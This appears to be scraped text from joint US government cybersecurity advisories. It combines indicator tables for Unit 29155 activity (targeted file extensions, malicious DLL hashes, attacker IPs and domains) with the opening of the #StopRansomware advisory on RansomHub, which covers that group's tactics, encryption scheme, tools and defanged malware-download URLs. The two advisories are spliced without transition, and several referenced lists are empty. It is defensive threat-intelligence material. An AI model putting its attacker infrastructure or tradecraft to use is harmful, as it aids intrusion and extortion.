u".ASM" | u".ASP" | u".ASPX" | u".BACKUP" | u".BAK" | u".BAT" |
u".BMP" | u".BRD" | u".BZ2" | u".CGM" | u".CLASS" | u".CMD" |
u".CONFIG" | u".CPP" | u".CRT" | u".CSR" | u".CSV" | u".DBF" |
u".DCH" | u".DER" | u".DIF" | u".DIP" | u".DJVU.SH" | u".DOC" |
u".DOCB" | u".DOCM" | u".DOCM" | u".DOCX" | u".DOT" | u".DOTM" |
u".DOTX" | u".DWG" | u".EDB" | u".EML" | u".FRM" | u".GIF" |
u".HDD" | u".HTM" | u".HWP" | u".IBD" | u".INC" | u".INI" |
u".ISO" | u".JAR" | u".JAVA" | u".JPEG" | u".JPG" | u".JSP" |
u".KDBX" | u".KEY" | u".LAY" | u".LAY6" | u".LDF" | u".LOG" |
u".MAX" | u".MDB" | u".MDF" | u".MML" | u".MSG" | u".MYD" |
u".MYI" | u".NEF" | u".NVRAM" | u".ODB" | u".ODG" | u".ODP" |
u".ODS" | u".ODT" | u".OGG" | u".ONETOC2" | u".OST" | u".OTG" |
u".OTP" | u".OTS" | u".OTT" | u".P12" | u".PAQ" | u".PAS" |
u".PDF" | u".PEM" | u".PFX" | u".PHP" | u".PHP3" | u".PHP4" |
u".PHP5" | u".PHP6" | u".PHP7" | u".PHPS" | u".PHTML" | u".PNG" |
u".POT" | u".POTM" | u".POTX" | u".PPAM" | u".PPK" | u".PPS" |
u".PPSM" | u".PPSX" | u".PPT" | u".PPTM" | u".PPTM" | u".PPTX" |
u".PS1" | u".PSD" | u".PST" | u".RAR" | u".RAW" | u".RTF" |
u".SAV" | u".SCH" | u".SHTML" | u".SLDM" | u".SLDX" | u".SLK" |
u".SLN" | u".SNT" | u".SQ3" | u".SQL" | u".SQLITE3" | u".SQLITEDB" |
u".STC" | u".STD" | u".STI" | u".STW" | u".SUO" | u".SVG" |
u".SXC" | u".SXD" | u".SXI" | u".SXM" | u".SXW" | u".TAR" |
u".TBK" | u".TGZ" | u".TIF" | u".TIFF" | u".TXT" | u".UOP" |
u".UOT" | u".VBS" | u".VCD" | u".VDI" | u".VHD" | u".VMDK" |
u".VMEM" | u".VMSD" | u".VMSN" | u".VMSS" | u".VMTM" | u".VMTX" |
u".VMX" | u".VMXF" | u".VSD" | u".VSDX" | u".VSWP" | u".WAR" |
u".WB2" | u".WK1" | u".WKS" | u".XHTML" | u".XLC" | u".XLM" |
u".XLS" | u".XLSB" | u".XLSM" | u".XLSM" | u".XLSX" | u".XLT" |
u".XLTM" | u".XLTX" | u".XLW" | u".YML" | u".ZIP" |
stage2.exe
and its respective payload, Tbopbh.jpg
, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.
Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll
.
Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The hashes in Table 26 represent both byte orders.
Filename | MD5 (Reversed) | MD5 (Functional) |
---|---|---|
Afgyyppsysmtddhvhhaw.dll | d034fe4c71b16b6d331886c24fef2751 | 4074798a621232dc448b65db7b1fdd66 |
Avbbwys.dll | 422437f326b8dbe30cc5f103bde31f26 | 7f84263fd24f783ff72d5ae91011b558 |
Azkebvoyswvjnrpmn.dll | 562c337b8caca330da2ea6ae07ee5db6 | f73d203bdf924658fd6edf3444c93a50 |
Budoejokuqbge.dll | 58e879213d81333b628434ba4aeb2751 | 08dfebc04eb61c9a6d87b6524c1c0f2e |
Bwqdffttejlkeqe.dll | 1c85c0d044ac837e8939564afac1eb32 | 8633bd2bbbb5da22c3f8751150186c42 |
Bxqbsyxfkjzmhdtfceoak.dll | 7234da8ceafbe6586469f18c03cc1832 | 5f4df6dd8e644d59eaf182e500b5e7bf |
Clsrncpbaucrabuobcpale.dll | 618d62dd95fd9aeb855fe2ef1403dce5 | 955e4c198ee58e40fe92cb74ceefdf00 |
Cpdvzvzyghy.dll | d40195a444526eafb0db56d95bf8655d | a905d620717f75751aa94ceb88995dbc |
Ctiktdfyauejxfak.dll | d06761b2cff86035a4838110ed6ab622 | 2ca6bcf16ee4293a771a1cf7b7b9ee49 |
Czxhayyankwsp.dll | 59da31da4db1aa5f9a5c7c0c151422c8 | de1bf141976776becd376a0dac400df6 |
Djpajq.dll | de1f9d1f0336ddcff832ad3900acd2f1 | 974e7c0b3660fbf18f29eac059f85ac0 |
Dmdtflkcgebf.dll | 394e056cb6cb732dfd5e0d45d3dae938 | 4d8343c40be53d6521244fe74393d937 |
Ejcpaujkmvjndgqznimmkgd.dll | b7c1a8d39f46eaf52be90e24565dd6b0 | 7a70d5fbbafe3454b76e3ad2f009618f |
Encuutwvdqbxlxh.dll | 2b39eab325906b0a3ab7e584c3d67349 | df4f856f783d23fb01af1e0e64bc0e20 |
Esalfjyraquwfxcgufwzip.dll | 80f0ee332a452172533ad8863bb3bc63 | f4f4e55a00d2f3a433c9e5624285ac1c |
Fdgofjdvmmllgsxunb.dll | 9345425cf07b4c39a80cd8540e08bfde | eef2363744345741e09fe5380eeb4df3 |
Fkhzvcuucaprsibp.dll | aecb57e20d2c0b0d9fece2cbcbcc3459 | 4bce4831b1dd71f19c55b3e3b5e99856 |
Fkthhyexkr.dll | 58dc7c9577ff90a046359ca255c0c9f4 | 19cb20c4e7dbfe15c1aa284752d0fecb |
Fqattuyxknkhv.dll | 5c9e2195d10375b746b6717fdb47b5b9 | 2b5f159f022109a8de1bc5dd9e3138a0 |
Fqyubbzbubsge.dll | afbb9459d4a0f60d7ffb3b3532d11bc2 | 8d3d4d702ba6b4be2766a41bfe5ff76e |
Frkmlkdkdubkznbkmcf.dll | b3370eb3c5ef6c536195b3bea0120929 | e61518ae9454a563b8f842286bbdb87b |
Gsiook.dll | a1b509254a0a1daa7e00d279ec974461 | 0e03103e8110785156105946e48ea9e0 |
Gutjuhi.dll | 791a81f31a8e7090a7d5417451e09efa | fba76f4eb2e7a2eb17193bebe290a198 |
Hisvswmeswmnqbvzpoxzx.dll | e1a15bc13157134f542cd9c55c742460 | c9d1677f4f89b95b41591b23a1dc1a63 |
Hsoahb.dll | cd62d4a178705b2b90a8babd8613df93 | 032f5642d4fb2fdd74e6f20a13c57746 |
Icyjkszdzgoxdfuwptkwxo.dll | f34f60375bebad861a35b7c4bb0fa1c8 | a66b3b22a3619f739b197d0d443b700c |
Jdfzavlqr.dll | 7fe7f33d9b5dbdf3d032d2a10e39f283 | 8cfef66b390f08bdbfd940922cf51650 |
Jrdggfjvve.dll | b32e14a9b7de6c92cd16758fa6e23346 | 1220b580cef1bf22351e271773945d20 |
Jteieurqgvpgnhw.dll | b85538f665fdb6c8d9a74f2df7369832 | ffa68749aa3fc6495e2c49b01d964339 |
Kbuqtmznmodjzvxvwxcvho.dll | 869742fb9db71fdb66f00528fe2966ec | 5b884f15dc9b072d7bbad9ec2b249f38 |
Kdmvyizz.dll | 2128361d8aaae1225d50c9add32006a1 | 9152c9de57b5647ee4ab3dff551dc8dd |
Kfxghcmg.dll | 56e0446a6d7175a0d09110bc483ddbed | fc418fdda06ce5982153766dcefb71d9 |
Krewcizfplntbwcqawfhtfpd.dll | 6a4fca88ee36fecc5113e188cc39d25c | 5c3b0040e2dece6e17093ae607b79044 |
Lsurhpmpyewhv.dll | 143594597130e301499e5940a5fb798a | 911c7e82f32f78577dcd725a7adb114d |
Mbkzrkfasxgxtzhgpgsehip.dll | 993f01861aff306df44e6475f7886f37 | e4634ef9bfe7b598b857ad997445b239 |
Mhnovdgzzidqx.dll | 64b9feeccf6c183b9f7138f8fc53acbb | 7e0c42d33921a89724424f17c97037bd |
Mlfampnfnmjvjnahkrawwqd.dll | ddec2d79f460a881849037336ba8968f | d973210977957209f255b58eb1715b12 |
Mppveiyannobrcdlkd.dll | 9606b4720a0e73ef1f00505a11aab2f7 | 0adc2530cf348c0a3d53a680291a3d67 |
Mzhyeemgqbmamubqn.dll | f772f5c65d65412f61ef5f2660e33ceb | f8ffd1eab6223e31b15d0fd6c3c0472e |
Nbbudwt.dll | 875f9200b49db08c33962b0a6bd05ab9 | 2e035360971a817b854d7d5a2b008717 |
Nhqcfzagulwaw.dll | fa97dbe84ce7717b754795fa89f13dce | 601c12596dfea84c2113ae5ee59a52ec |
Nlzhpvuzzoycqnnpl.dll | d8c04ecd646a1f8537a59f63518ef3c6 | 47f4534da421daf8089cf34d53f6bb6e |
Noubvdigjlwsnqiylzgikkk.dll | 3bcff990faacbebb8fb470dfe03e2543 | 683546b9171a1ea284a96d1b45d1d823 |
Nvxwbzciqarteyuz.dll | c265188fdadddb648629e8060601dca7 | af85885a74cfe099676af542dcdc5741 |
Nykfvwmchighqwcguabvgq.dll | 8a2ba7f9cb6f65edf65dbe579907551e | 673586594242d99ab02118595e457297 |
Ofgdwttnmqibnmpqx.dll | 9657c2ef6ed5229740b125df9ca6c915 | 0dc5ac12f7690db15c99eaabc11b129c |
Ohtvepefcjnchrrasokn.dll | a5494ffd9efb7c3df59c527076a05e62 | e2cc52273d56ed66c800a726760c1ed0 |
Olkscszculdbzvco.dll | 85afdef18d65b0518d709a5a324ea57a | 77675a24040f10c85112d9a219d5f1c7 |
Onkwzkpfuqazvali.dll | da4d81f9ef3b25ea09f34481d923dd9d | cc4a9db6f250114e26d8d9ba6ab46bc9 |
Opaqwrazeyyilbbjlkf.dll | 0e6374042b33d78329149a6189a7cb46 | 1934e2ebc64d41e37ef53ea0c075e974 |
Owxtabfdqhkaahhwsgkatuu.dll | d33f608f561096be24cba91797e0da2f | 332b7f6662e28e3577bd1b269904b940 |
Poezcjhvkzgmnyqljpbte.dll | 32db8abce1618e60441f5c7cf4be0d22 | 2b2509c6ee46d6327f2f1c9a75122d15 |
Rvyqctymumtudroyae.dll | dd2431b1f858b4ca14a4ea05fb8c4a06 | 9b2924c727aa3a061906321a66c9050c |
Sutragevr.dll | 7d3b529db1bd896d9fd877b85cafdc64 | de276cf07ccffa18d7ffc35281bca910 |
Sxkdxclqmxnmjgedhgagl.dll | 6e1394938c2fecad2d4f5b3bcf357ec0 | d6b41747cb035c4c2b08790cd57f0626 |
Tosyxesxgrzyb.dll | 99305ce01cc2d0f58cd226efb2de893f | 6859fe5a3eead00a563cd93efcc6ea96 |
Tpmnkauftdydomyz.dll | 6c152774f6894407075e6f0a2859bbae | 981160dee6cd25fb181e54eca7ff7c22 |
Tptjtwfhpsjfksqoajt.dll | 343b140977b3f9b227e7e5f82b0fadb5 | 95cf2a5a24b0d33d621bb8995d5826bc |
Tsgblplhdwwj.dll | 54a9fa9eb337a3b5ca7b0fa4553e439d | cee5acbfef7e76f52f40b8ae95199c50 |
Uqhznlcagzyoqrbyylnnwn.dll | 4c19aeecbfca13b8a199703d8b8284b9 | ad0ca738aa6c987e4ee1a87ff2b8acd5 |
Uslrfkxccdyetfdxmaokbhv.dll | dc795cb9290b1bc0b7fb1ce9d6ae7c93 | 552d9b79cc544fc6c3e8aa204dd00811 |
Waordspinycera.dll | 9935a86108e3ae3f72cd15817601dcc6 | 5d063eecd894d3d523875bc82ef6f319 |
Wcfsobntsczz.dll | 77aa3f342a0d69fda67c853bcc004d48 | d0b00a6c83ce810ec2763af17e8ab1c4 |
Wpqyhvfnunlabx.dll | 03af632aa6f87bf9dd4364ee3b612cbb | 9f11e915be5c0d02a3130329cf032a28 |
Wqwpawlulyrsrjcbvuvddeud.dll | 41871fef433d7b4b89fd226fe3a1a2c0 | e21fe98cc8866c0eeecf3549ebcec751 |
Wqxpgvsgvhygmfbziucxcuh.dll | 246d9f9831b125ea7e6ef21bc4c8a0ca | dea3ae8225913dd98148fc86cfc3bcbe |
Xgcpgrxhchgwz.dll | 9c695be3703194fdb71c212a0832bcf3 | 8744cec7547b1e73705c10a264e28e08 |
Xgkepoc.dll | 69e58c5ee69f5e5e8a58f4afdd59adfe | d43446b4a22a597b93b559821ee5ac9b |
Xlfthpiq.dll | 540ee8e39150c539fea582b0e77be7b0 | 3fe96ff4a5ef0f5346ce645a2a893597 |
Xlocky.dll | 0a2affa6d895baab087b84e93145da35 | 246f31c86bbbe7f65c0126cf4a1a947a |
Xqblktvxmnxrzwiuqdfxzrd.dll | 569c1d31f4c7ec7701d8e4e51b59fe85 | 5eaa7e812733a5c8cda734fab2f752d5 |
Xykqrksoqqgyuckfc.dll | 09a2d85e809d36bff82bd5ab773980a3 | 96964aed18f65a7acae632f358a093f6 |
Yawyjonk.dll | 3ccf799ff208981349cee4fb1a1cf88c | 4e9c55c6fe25d61ca4394de794546fab |
Yrknbt.dll | 6154760e602bd71192d93f72fbdb486e | 94bf96b76c2a092de8962496ce35deaf |
Yvbmuigfihprdxgiirp.dll | b0d0a23766fa64ece9315f37b28bb4c0 | 1e22d64f263e8ea4b2d37dcd9b7c3012 |
Ywrovtjimixpmizuln.dll | ca43a241042b5fcc305393765ae18e69 | 28d571ddb5c04d065dfe1be9604663ba |
Zfgdccnwnee.dll | 251f3a4757d9e4de0499cc30c0bc00a9 | 755dac7edd17fbf5b5c449dd06c02e14 |
Zkuxhxwbvifejn.dll | 9d7ab8b0aa669125d9a5adc4f46c56f3 | af277ae0fbf6cc20f887696ea4756d46 |
Zsdflpivel.dll | a9c9c0be8eca3b575c24da0fcf1af1a9 | 1cac5c0cb8801e8730447023270d8d56 |
Table 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.
IP Address |
---|
5.226.139[.]66 |
45.141.87[.]11 |
46.101.242[.]222 |
62.173.140[.]223 |
79.124.8[.]66 |
90.131.156[.]107 |
112.51.253[.]153 |
112.132.218[.]45 |
154.21.20[.]82 |
179.43.133[.]202 |
179.43.142[.]42 |
179.43.162[.]55 |
179.43.175[.]38 |
179.43.175[.]108 (data exfiltration site) |
179.43.176[.]60 |
179.43.187[.]47 |
179.43.189[.]218 |
185.245.84[.]227 |
185.245.85[.]251 |
194.26.29[.]84 |
194.26.29[.]95 |
194.26.29[.]98 |
194.26.29[.]251 |
Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.
Domain Name |
---|
interlinks[.]top |
https://3proxy[.]ru |
https://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber actors and should be investigated prior to blocking.) |
https://nssm[.]cc |
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).
Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.
The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion
URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.
The authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed:
RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [T1018][T1046][T1059.001].
Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe
, left on the user’s desktop (C:Users%USERNAME%Desktop
) or downloads (C:Users%USERNAME%Downloads
) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001].
Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods.
Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.
RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [T1486]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes:
The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.
RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.
The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.
The next two bytes were always seen to be 0x0001.
The next 32 bytes are the public encryption key for the file.
The next four bytes are a checksum value.
The last four bytes are always seen to be the sequence 0x00ABCDEF.
The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt
is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe
program to delete volume shadow copies [T1490].
See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.
Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
Tool Name | Description |
---|---|
BITSAdmin | A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers. |
Cobalt Strike [S0154] | A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution. |
Mimikatz [S0002] | A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation. |
PSExec [S0029] | A tool designed to run programs and execute commands on remote systems. |
PowerShell | Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. |
RClone | A command line program used to sync files with cloud storage services. |
Sliver | A penetration testing toolset which allows for remote command and control of systems. |
SMBExec | A tool designed to manipulate SMB services for remote code execution. |
WinSCP | Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts. |
CrackMapExec | Pentest Toolset |
Kerberoast | Kerberos Brute force and Exploitation Tool |
AngryIPScanner | Network Scanner |
Disclaimer: Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking).
See Table 2–Table 5 for IOCs obtained from FBI investigations.
Filename | Description |
---|---|
C:Users%USERNAME%AppDataLocalProgramsPythonPython311Scriptscrackmapexec.exe | CrackMapExec |
C:Users%USERNAME%AppDataLocalProgramsPythonPython311Scriptskerbrute.exe | Kerberoasting |
C:Users%USERNAME%DownloadsAnydesk.exe | Anydesk C2 |
C:Users%USERNAME%DesktopIamBatMan.exe | Ransomware |
C:UsersbackupexecDesktopstealer_cli_v2.exe | Info Stealer |
C:Users%USERNAME%Downloadsnmap-7.94-setup.exe | Nmap |
C:Program Files (x86)Nmapnmap.exe | Nmap |
C:Users%USERNAME%Downloadsmimikatz_trunkx64mimikatz.exe | Mimikatz |
C:UsersbackupexecDownloadsx64mimikatz.exe | Mimikatz |
Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.
IP Address |
---|
8.211.2[.]97 |
45.95.67[.]41 |
45.134.140[.]69 |
45.135.232[.]2 |
89.23.96[.]203 |
188.34.188[.]7 |
193.106.175[.]107 |
193.124.125[.]78 |
193.233.254[.]21 |
Web Requests |
---|
http[:]//188.34.188[.]7/555 |
http[:]//188.34.188[.]7/555/ |
http[:]//188.34.188[.]7/555/amba16.ico |
http[:]//188.34.188[.]7/555/bcrypt.dll |
http[:]//188.34.188[.]7/555/CRYPTSP.dll |
http[:]//188.34.188[.]7/555/en |
http[:]//188.34.188[.]7/555/en-US |
http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe |
http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe.Config |
http[:]//188.34.188[].7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI |
http[:]//89.23.96[.]203/ |
http[:]//89.23.96[.]203/333 |
http[:]//89.23.96[.]203/333/ |
http[:]//89.23.96[.]203/333/1.exe |
http[:]//89.23.96[.]203/333/1.exe.Config |
http[:]//89.23.96[.]203/333/10.exe |
http[:]//89.23.96[.]203/333/12.exe |
http[:]//89.23.96[.]203/333/12.exe.Config |
http[:]//89.23.96[.]203/333/2.exe |
http[:]//89.23.96[.]203/333/2.exe.Config |
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe |
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe.Config |
http[:]//89.23.96[.]203/333/3.exe |
http[:]//89.23.96[.]203/333/3.exe.Config |
http[:]//89.23.96[.]203/333/4.exe |
http[:]//89.23.96[.]203/333/4.exe.Config |
http[:]//89.23.96[.]203/333/5.exe |
http[:]//89.23.96[.]203/333/5.exe.Config |
http[:]//89.23.96[.]203/333/6.exe |
http[:]//89.23.96[.]203/333/7.exe |
http[:]//89.23.96[.]203/333/8.exe |
http[:]//89.23.96[.]203/333/9.exe |
http[:]//89.23.96[.]203/333/92.exe |
http[:]//89.23.96[.]203/333/AmbaPDF.ico |
http[:]//89.23.96[.]203/333/ambapdf.ico.DLL |
http[:]//89.23.96[.]203/333/bcrypt.dll |
http[:]//89.23.96[.]203/333/Cabinet.dll |
http[:]//89.23.96[.]203/333/CRYPTBASE.DLL |
http[:]//89.23.96[.]203/333/cryptnet.dll |
http[:]//89.23.96[.]203/333/CRYPTSP.dll |
http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe |
http[:]//89.23.96[.]203/333/DPAPI.DLL |
http[:]//89.23.96[.]203/333/en |
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.dll |
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.exe |
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll |
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe |
http[:]//89.23.96[.]203/333/en-US |
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.dll |
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.exe |
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll |
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe |
http[:]//89.23.96[.]203/333/iertutil.dll |
http[:]//89.23.96[.]203/333/information.exe |
http[:]//89.23.96[.]203/333/information.exe.Config |
http[:]//89.23.96[.]203/333/information.INI |
http[:]//89.23.96[.]203/333/IPHLPAPI.DLL |
http[:]//89.23.96[.]203/333/mshtml.dll |
http[:]//89.23.96[.]203/333/msi.dll |
http[:]//89.23.96[.]203/333/SspiCli.dll |
http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe |
http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe.Config |
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe |
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe |
http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe |
http[:]//89.23.96[.]203/333/urlmon.dll |
http[:]//89.23.96[.]203/333/USERENV.dll |
http[:]//89.23.96[.]203/333/webio.dll |
http[:]//89.23.96[.]203/333/winhttp.dll |
http[:]//89.23.96[.]203/333/WININET.dll |
http[:]//89.23.96[.]203/333/WINMM.dll |
http[:]//89.23.96[.]203/333/WINMMBASE.dll |
http[:]//89.23.96[.]203/333/winnlsres.dll |
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe |
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe.Config |
http[:]//temp.sh/KnCqD/superloop.exe |
https[:]//grabify.link/Y33YXP |
https[:]//i.ibb.co/2KBydfw/112882618.png |
https[:]//i.ibb.co/4g6jH2J/2773036704.png |
https[:]//i.ibb.co/b1bZBpg/2615174623.png |
https[:]//i.ibb.co/Fxhyq6t/2077411869.png |
https[:]//i.ibb.co/HK0jV1G/534475006.png |
https[:]//i.ibb.co/nbMNnW4/2501108160.png |
https[:]//i.ibb.co/p1RCtpy/2681232755.png |
https[:]//i.ibb.co/SxQLwYm/1038436121.png |
https[:]//i.ibb.co/v1bn9ZK/369210627.png |
https[:]//i.ibb.co/V3Kj1c2/1154761258.png |
https[:]//i.ibb.co/X2FR8Kz/2113791011.png |
https[:]//i.ibb.com:443/V3Kj1c2/1154761258.png |
https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.css |
https[:]//12301230[.]co/npm/module.external/jquery.min.js |
https[:]//12301230[.]co/npm/module.external/moment.min.js |
https[:]//12301230[.]co/npm/module.external/client.min.js |
https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.js |
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js |
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js |
https[:]//samuelelena[.]co/npm/module.external/moment.min.js |
https[:]//samuelelena[.]co/npm/module.external/client.min.js |
https[:]//samuelelena[.]co/ |
http[:]//samuelelena[.]co/ |
https[:]//samuelelena[.]co/npm |
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js |
http[:]//samuelelena[.]co/npm/ |
http[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js |
http[:]//samuelelena[.]co/npm/module.external/client.min.js |
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor. |
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js |
https[:]//samuelelena[.]co/npm/module.external |
https[:]//samuelelena[.]co/np |
https[:]/samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js |
https[:]//samuelelena[.]co/npm/module[.]tripadvisor/module[.]tripadvisor[.]js |
https[:]//samuelelena[.]co/npm/module[.]external/client.min.js |
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js |
http[:]//samuelelena[.]co:443/ |
http[:]//samuelelena[.]co/npm/module.external/jquery.min.js |
https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.css |
https[:]//40031[.]co/npm/module.external/jquery.min.js |
https[:]//40031[.]co/npm/module.external/moment.min.js |
https[:]//40031[.]co/npm/module.external/client.min.js |
https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.js |
Email Addresses |
---|
brahma2023[@]onionmail.org |
<victim_organization_name>[@]protonmail.com |
See Table 6–Table 17 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title | ID | Use |
---|---|---|
Obtain Capabilities: Exploits | T1588.005 | RansomHub affiliates may buy, steal, or download exploits that can be used during targeting. |
Technique Title | ID | Use |
